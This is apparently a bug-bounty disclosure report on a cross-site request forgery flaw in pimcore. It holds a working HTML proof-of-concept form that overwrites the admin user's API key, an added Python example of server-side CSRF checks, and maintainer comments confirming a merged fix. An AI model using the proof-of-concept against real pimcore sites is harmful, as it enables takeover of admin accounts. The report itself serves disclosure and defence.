Cross-Site Request Forgery (CSRF) in pimcore/pimcore


Reported on

Jul 25th 2021

✍️ Description

Your application has no CSRF protection, and the session cookie's SameSite attribute is set to Lax. Lax still sends the cookie on top-level GET navigations, so any action that alters data through a GET request is, without doubt, vulnerable to CSRF.

Run the HTML payload below; afterwards you should see that the admin user's API key has been changed to the following value: 63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12

🕵️‍♂️ Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
  <form action="">
    <input type="hidden" name="xaction" value="update" />
    <input type="hidden" name="&#95;dc" value="" />
    <input type="hidden" name="data" value="&#123;&quot;id&quot;&#58;1&#44;&quot;name&quot;&#58;&quot;admin&quot;&#44;&quot;firstname&quot;&#58;null&#44;&quot;lastname&quot;&#58;null&#44;&quot;email&quot;&#58;null&#44;&quot;apiKey&quot;&#58;&quot;63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12&quot;&#44;&quot;image&quot;&#58;&quot;&#47;admin&#47;user&#47;get&#45;image&#63;id&#61;1&quot;&#125;" />
    <input type="submit" value="Submit request" />
  </form>

I tested this payload on both the stable and dev editions (on demo sites).

💥 Impact

This vulnerability is capable of taking control of any user's account.
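The three server-side controls whose absence this report relies on (no mutation over GET, an Origin/Referer check, and a session-bound synchronizer token), shown as an added example in Python; this is constructed illustration code, not pimcore's fix, and the session store, `example.test` origin, `csrf_token` field name and `NEWKEY` value are all assumptions. The `xaction=update` / `data` form fields mirror the PoC above.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory store: session id -> CSRF token (assumption, not pimcore's code).
SESSION_TOKENS = {}
SITE_ORIGIN = "https://example.test"  # assumed origin of the protected application


def issue_token(session_id):
    """Mint a per-session synchronizer token to embed in legitimate forms."""
    token = secrets.token_hex(32)
    SESSION_TOKENS[session_id] = token
    return token


def is_state_changing(params):
    # The report's PoC drives the user-update action with xaction=update.
    return params.get("xaction", [""])[0] in {"update", "create", "delete"}


def same_origin(url, site_origin):
    a, b = urlsplit(url), urlsplit(site_origin)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def check_request(method, headers, form, session_id):
    """Decide whether a request may proceed. Returns (allowed, reason).

    `form` is the urlencoded parameter string, whether it came from the
    query string (GET) or the body (POST).
    """
    params = parse_qs(form)
    if not is_state_changing(params):
        return True, "read-only"
    # 1. Never mutate on GET: SameSite=Lax still attaches cookies to top-level GET navigations.
    if method != "POST":
        return False, "mutation over GET"
    # 2. A cross-site form submission carries the attacker's Origin/Referer, not ours.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if not same_origin(origin, SITE_ORIGIN):
        return False, "cross-site origin"
    # 3. The synchronizer token must match the session's, compared in constant time.
    expected = SESSION_TOKENS.get(session_id)
    supplied = params.get("csrf_token", [""])[0]
    if expected is None or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"
```

A request shaped like the PoC (GET, cross-site Referer, no token) fails the first check; the same parameters sent by the application's own form over POST with a valid token pass all three.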


a year ago


Hey amammad, just contacted pimcore re: this report. Waiting to hear back, good job!

a year ago


Hi dear pimcore team, if you want more help just tell me.

Bernhard Rusch
a year ago


@amammad thanks!

Bernhard Rusch validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 8aa0ca a year ago
Bernhard Rusch has been awarded the fix bounty
Bernhard Rusch
a year ago

The maintainer fixes the problem as well.
